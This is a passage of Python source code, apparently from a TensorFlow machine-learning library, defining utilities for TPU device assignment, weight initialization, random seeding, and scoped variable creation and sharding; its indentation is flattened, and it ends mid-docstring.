global _tpu_device_assignment_dict
_tpu_device_assignment_dict = dict()
def GetTpuDeviceAssignment(job=None):
return _tpu_device_assignment_dict[job]
# Whether it's running in eager mode. This is different than
# tf.executing_eagerly(), which will return False inside a tf.function.
_IS_EAGER_MODE = False
def SetIsEagerMode():
global _IS_EAGER_MODE
assert tf.executing_eagerly(), 'It must be in eager mode when setting this.'
_IS_EAGER_MODE = True
def IsEagerMode():
return _IS_EAGER_MODE
# Maintains a tf.GradientTape stack.
_GRADIENT_TAPE_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GradientTape(*args, **kwargs):
"""Creates a tf.GradientTape and use it for automatic differentiation."""
tape = tf.GradientTape(*args, **kwargs)
_GRADIENT_TAPE_STACK.stack.append(tape)
try:
with tape:
yield
finally:
_GRADIENT_TAPE_STACK.stack.pop()
# The tf.train.ExponentialMovingAverage singleton used by all subtasks in
# multi-task training with ExecutorTpu.
_EXECUTOR_EMA = None
def SetExponentialMovingAverage(ema):
global _EXECUTOR_EMA
assert ema
assert not _EXECUTOR_EMA, 'EMA was set before.'
_EXECUTOR_EMA = ema
def ExponentialMovingAverage():
return _EXECUTOR_EMA
def SessionConfig(soft_placement=True,
inline=True,
cluster_def=None,
disable_meta_optimizer=False):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
disable_meta_optimizer: Turns off grappler/metagraph optimizer.
Returns:
A TF session config proto.
"""
session_config = tf.config_pb2.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
session_config.share_cluster_devices_in_session = True
if disable_meta_optimizer:
# Useful if start-up time is critical.
session_config.graph_options.rewrite_options.disable_meta_optimizer = True
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
def ConvertNoneGradientToZeros(xs, dxs):
"""Sanitize dxs so that None becomes zeros appropriately.
Args:
xs: A list of tensors.
dxs: A list of tensors. dxs[i] corresponds to xs[i]'s gradient.
Returns:
A `.NestedMap` same as dxs with None replaced by a zero tensor.
"""
fn = lambda x, dx: tf.zeros_like(x) if dx is None else dx
return Transform(fn, xs, dxs)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
class _Unique:
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (id(v) in self._vset):
return False
else:
self._vset.add(id(v))
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper:
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler:
"""A reservoir sampler.
This class implements reservoir sampling: Given a limit of `num_samples` total
samples, this class maintains a uniform probability (1 / `num_samples`) of
keeping any item dynamically added to the sampler.
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
class RNNCellStateInit:
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
shape: A array of ints/symbols for specifying the shape of the state.
init: Hyperparameters as returned by one of the static implemetaitons in
RNNCellStateInit.
dtype: The dype of the states. Defaults to tf.float32.
name: A name for the operation. If --stateless_vars_init is set, this name
is used to generate a seed on a per-variable basis. Otherwise, this name
is optional.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
if use_stateless_vars_init():
if name is None:
raise ValueError('InitRNNCellState() requires a `name` argument when '
'--stateless_vars_init is enabled.')
seed = _GenerateStatelessRngSeed(name, init.seed)
init_state = stateless_random_ops.stateless_random_normal(
shape=shape, dtype=dtype, name=name, seed=seed)
else:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
class WeightInit:
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed):
"""Parameters of this class."""
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random.uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random.uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Category(scale=2, seed=None):
"""tf.floor(scale * tf.random.uniform(0., 1.0))."""
return WeightInit._Params('category', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def GaussianSqrtFanAvg(scale=1.0, seed=None):
"""tf.random.normal(0, sqrt(2.0 / (in + out)))."""
return WeightInit._Params('gaussian_sqrt_fanavg', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def UniformUnitScalingFanAvg(scale=1.0, seed=None):
"""Same as tf.variance_scaling_initializer() ...
Samples are drawn from a uniform distribution within [-limit, limit], with
limit = sqrt(3 * scale / n)
where
n = max(1., (fan_in + fan_out) / 2).
See tf.keras.initializers.VarianceScaling for details.
Args:
scale: A Python float.
seed: A Python int or None.
Returns:
A WeightInit param.
"""
return WeightInit._Params('uniform_unit_scaling_fan_avg', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature for user picking up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
# TODO(rpang, jonathanasdf): explore adding _is_default to hyperparams.Param.
def IsDefaultParamInit(p):
return (p.method == 'xavier' and
abs(p.scale - _DEFAULT_XAVIER_INIT) < 1e-7 and p.seed is None)
def WeightParams(shape,
init=None,
dtype=None,
collections=None,
device_mesh=None,
tensor_split_dims_mapping=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
if device_mesh is not None:
assert tensor_split_dims_mapping is not None
assert len(tensor_split_dims_mapping) == len(shape)
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
p.Define(
'device_mesh', device_mesh,
'A numpy.ndarray describing the topology of a device mesh to partition'
' this variable onto. Each element in the np.ndarray is the ID of a'
' device in the topology. device_mesh and tensor_split_dims_mapping below'
' together specifies how this weight tensor should be sharded across'
' different tpu cores. If None, this variable is not sharded.'
' Here are examples: np.array([0, 1, 2, 3, 4, 5, 6, 7]) which is a 1d'
' mesh with 8 devices, np.array([[0, 1, 2, 3], [4, 5, 6, 7]]) which is'
' 2d matrix of 8 devices.')
p.Define(
'tensor_split_dims_mapping', tensor_split_dims_mapping,
'A list of integers that map each tensor axis to the device mesh axis'
' along which it is sharded. Its length is the tensor rank, and'
' split_dims_mapping[i] is device mesh axis for tensor dimension i. Use'
' -1 for tensor dimensions that are not sharded. If the list is set to'
' None and a device_mesh is specified, the sharding will be treated as'
' replicated. Here is a concrete examples: '
' device_mesh=np.array([[0, 1, 2, 3] [4, 5, 6, 7]]), of shape [2, 4]'
' shape=[x, y, z], so this is a 3d variable.'
' tensor_split_dims_mapping=[-1, -1, 1], in this case, the third dim'
' of the variable is split along the second dim of the mesh. Each '
' split of the variable is of the shape [x, y, z/4].')
return p
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
class _CollectionGetter:
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
if key.startswith('_'):
key = key[1:]
return key.replace('[', '_').replace(']', '')
# Maintain a session for unit tests (initialized in test_utils.py).
_SESSION_SCOPE = ThreadLocalStack()
@contextlib.contextmanager
def UnitTestSessionScope(sess):
_SESSION_SCOPE.stack.append(sess)
try:
yield
finally:
_SESSION_SCOPE.stack.pop()
def GetUnitTestSession():
"""Get the current variable reuse setting."""
return _SESSION_SCOPE.stack[-1] if _SESSION_SCOPE.stack else None
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With GetOpportunisticVariableReuse() == True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse new variables or get new ones
_OPPORTUNISTIC_VARIABLE_REUSE = ThreadLocalStack()
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
_OPPORTUNISTIC_VARIABLE_REUSE.stack.append(enable_opportunistic_reuse)
try:
yield
finally:
_OPPORTUNISTIC_VARIABLE_REUSE.stack.pop()
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
return (_OPPORTUNISTIC_VARIABLE_REUSE.stack[-1]
if _OPPORTUNISTIC_VARIABLE_REUSE.stack else False)
_VARIABLE_RENAME_RULES = ThreadLocalStack()
# Global variable to track task calling scope.
# Currently only used for TPU Embedding purposes as a TPUEmbeddingLayer
# may be shared across tasks and the calling task needs to be known
# for tracking embedding activations for backprop.
_TASK_CALL_SCOPE = ThreadLocalStack()
def TaskCallScopeName(task):
"""Get a unique string identifying a task."""
return f'{task.params.name}_{id(task)}'
@contextlib.contextmanager
def TaskCallScope(task):
_TASK_CALL_SCOPE.stack.append(TaskCallScopeName(task))
try:
yield
finally:
_TASK_CALL_SCOPE.stack.pop()
def GetTaskCallScope():
"""Get the current task call scope."""
return _TASK_CALL_SCOPE.stack[-1] if _TASK_CALL_SCOPE.stack else None
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
_VARIABLE_RENAME_RULES.stack.append(renames)
try:
yield
finally:
_VARIABLE_RENAME_RULES.stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _VARIABLE_RENAME_RULES.stack:
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
_LIST_REGEX_DTYPE = ThreadLocalStack()
@contextlib.contextmanager
def VariableListDtypeRegexScope(list_regex_dtypes):
"""Append the list of (regex, dtype) to override the dtype.
Args:
list_regex_dtypes: pairs of (regexp, dtype). If the regexp matches, the data
type of the variable will be changed by the corresponding dtype.
Yields:
scope in which the list of (regex, dtype) is applied.
"""
_LIST_REGEX_DTYPE.stack.append(list_regex_dtypes)
try:
yield
finally:
_LIST_REGEX_DTYPE.stack.pop()
def FindDataType(var_name):
"""Find the data type for var_name.
Args:
var_name: A string, name of the variable.
Returns:
The dtype of the first matched regex with var_name, or None if no matching
found.
"""
for regex_dtypes in _LIST_REGEX_DTYPE.stack:
for regex, data_type in regex_dtypes:
if re.match(regex, var_name):
return data_type
return None
def GenerateSeedFromName(name):
"""Generate a random seed from a name string.
Args:
name: A string.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
def MaybeGenerateSeedFromScope():
"""Generate a random seed from the current name of the scope.
If running in eager mode, this returns 0.
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if not tf.executing_eagerly():
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
return 0
def GenerateSeedFromId(obj_id):
"""Generate a random seed from the id of an object.
If deterministic execution (i.e. unit test), generate the seed from a fixed
unique name instead.
Args:
obj_id: id(object).
Returns:
An integer seed in the range [0, 2**31 - 1).
"""
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
with tf.name_scope(''):
return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
md5 = hashlib.md5()
md5.update(np.int64(obj_id))
return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
# To keep track of all the variables ever gets created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})
_VARIABLE_SHAPE_PREFIXES = ThreadLocalStack()
def GetVarLeadingDimsAsCombinedLayers(var):
"""Gets the number of leading dimensions of `var` marked as combined layers.
Such dimensions represent variables from different layers stacked together,
e.g., in RepeatLayer, and optimizers (which have shape-dependant behaviors)
can adjust its behavior based on this information to match the behavior for
separate layer variables.
Args:
var: A variable.
Returns:
An integer representing the number of leading dimensions.
"""
try:
return var.op.get_attr('_num_leading_dims_for_combined_layers')
except ValueError:
return 0
except AttributeError:
# AttributeError: 'DistributedVarOp' object has no attribute 'get_attr'.
return 0
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
This new dimension will be marked as combined-layers. See also comments for
GetVarLeadingDimsAsCombinedLayers().
Args:
shape_prefix: a positive integer of shape prefix.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.stack.append(shape_prefix)
try:
yield
finally:
_VARIABLE_SHAPE_PREFIXES.stack.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES.stack
def GetVariableNumLeadingDimsForCombinedLayersContext():
"""Return the number of leading combined-layers dims for CreateVariable()."""
return len(_VARIABLE_SHAPE_PREFIXES.stack)
def GetFanInFanOut(shape, prefix_dims_to_skip):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < prefix_dims_to_skip:
raise ValueError(f'Variable shape is {shape} but prefix_dims_to_skip is '
f'{prefix_dims_to_skip}, larger than the shape rank.')
adjusted_shape = shape[prefix_dims_to_skip:]
if len(adjusted_shape) < 1:
return 1, 1
elif len(adjusted_shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return adjusted_shape[0], adjusted_shape[0]
else:
receptive_field_size = 1
for s in adjusted_shape[:-2]:
receptive_field_size *= s
fan_in = adjusted_shape[-2] * receptive_field_size
fan_out = adjusted_shape[-1] * receptive_field_size
return fan_in, fan_out
_VARIABLE_CREATOR_STACK = ThreadLocalStack().stack
def _DefaultVariableCreator(**kwargs):
kwargs.pop('var_name', None)
kwargs.pop('var_params', None)
return tf.get_variable(**kwargs)
def _GetVariableCreator():
fn = _DefaultVariableCreator
for wrapper in reversed(_VARIABLE_CREATOR_STACK):
fn = functools.partial(wrapper, fn)
return fn
@contextlib.contextmanager
def VariableCreatorScope(variable_creator):
"""Yields a context around a variable_creator, used by `CreateVariable()`.
The function must have the following signature::
def variable_creator(next_creator, **kwargs)
The function may delegate variable creation to the next variable creator, or
return its own tf.Variable.
This differs from tf.variable_creator_scope in that tf.variable_creator_scope
modifies a tf.Variable() call while this modifies a tf.get_variable() call. As
the code is migrated to TF2 and tf.get_variable() is deprecated, this may be
upgraded to using tf.variable_creator_scope instead.
This differs from tf.variable_scope(custom_getter=variable_creator) in that
the kwargs passed can be manipulated.
Variable creators are resolved from the outermost towards the innermost.
The innermost variable creator function is tf.get_variable.
The passed in kwargs must conform to what tf.get_variable accepts, with the
addition of `var_name` and `var_params`.
Args:
variable_creator: A variable creator function.
"""
_VARIABLE_CREATOR_STACK.append(variable_creator)
try:
yield
finally:
_VARIABLE_CREATOR_STACK.pop()
def PlaceOnTpuCore(core_id):
"""Returns a VariableCreatorScope that places variables on a given tpu core.
Only applies when running with TPUs.
Does not yet properly support model parallelism.
Args:
core_id: The tpu core id.
"""
def Creator(next_creator, **kwargs):
cluster = cluster_factory.Current()
if use_tpu():
device = cluster.WorkerDeviceInModelSplit(core_id)
elif (
tpu_compat() and
cluster.params.job in ('controller', 'trainer_client', 'executor_tpu')):
# The job is running in a fleet that uses tpu, but does not itself have
# access to the tpu, e.g. controller job. In this case, the returned
# device needs to be the cpu device on the tpu host for the given core.
# FIXME: the current implementation is wrong for large values of core_id.
device = cluster.ListDevices(cluster.params.worker)[0, 0]
else:
device = ''
with tf.device(device):
return next_creator(**kwargs)
return VariableCreatorScope(Creator)
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
if use_stateless_vars_init():
return _CreateVariableStateless(name, params, reuse, trainable, collections,
default_seed, synchronization, aggregation)
else:
return _CreateVariableStateful(name, params, reuse, trainable, collections,
default_seed, synchronization, aggregation)
def _CreateVariableStateful(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateful RNGs according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
seed = GenerateSeedFromName(var_name)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
# TODO(b/172827074): we do not natively support var initialization for
# int8 type except for constant initialization.
# NOTE: For int8, we initialize by scaling float32 random values to integer.
if init_dtype == tf.int8:
init_dtype = tf.float32
v_init = _CreateVarInitStateful(name, method, shape, dim0, seed, scale,
init_dtype)
if var_dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype, partition_info):
del dtype
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype, partition_info)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
if var_dtype == tf.int8:
def FloatToInt8Wrapper(init):
def _Wrapper(shape, dtype, partition_info):
del dtype
value = init(shape, init_dtype, partition_info)
scale = tf.math.maximum(
tf.math.reduce_min(value) / -127,
tf.math.reduce_max(value) / 127)
value = tf.divide(value, scale)
return tf.cast(value, tf.int8)
return _Wrapper
v_init = FloatToInt8Wrapper(v_init)
# Variable creators.
def MaybePinVarsToCpu(next_creator, **kwargs):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return next_creator(**kwargs)
return next_creator(**kwargs)
def MaybeOpportunisticVariableReuse(next_creator, **kwargs):
try:
return next_creator(**kwargs)
except ValueError: # Possibly the variable already exists
if GetOpportunisticVariableReuse():
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
return next_creator(**kwargs)
else:
raise
def LingvoVariableCreator(next_creator, **kwargs):
"""Lingvo variable creator."""
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
with tf.variable_scope(name) as scope:
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=True)
with tf.variable_scope(var_scope), tf.variable_scope(var_name, reuse=reuse):
var = next_creator(**kwargs)
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
(cached, p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.ToText()
for col in p.collections:
tf.add_to_collection(col, var)
return var
with VariableCreatorScope(LingvoVariableCreator):
with VariableCreatorScope(MaybeOpportunisticVariableReuse):
with VariableCreatorScope(MaybePinVarsToCpu):
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=GetVariableShapePrefixes() + list(shape),
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
count = (
len(GetVariableShapePrefixes()) + len(shape) -
len(tensor_split_dims_mapping) -
len(gshard_utils.GetMeshSplitDimPrefixContext()))
tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _CreateVariableStateless(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateless RNGs according to `params`.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
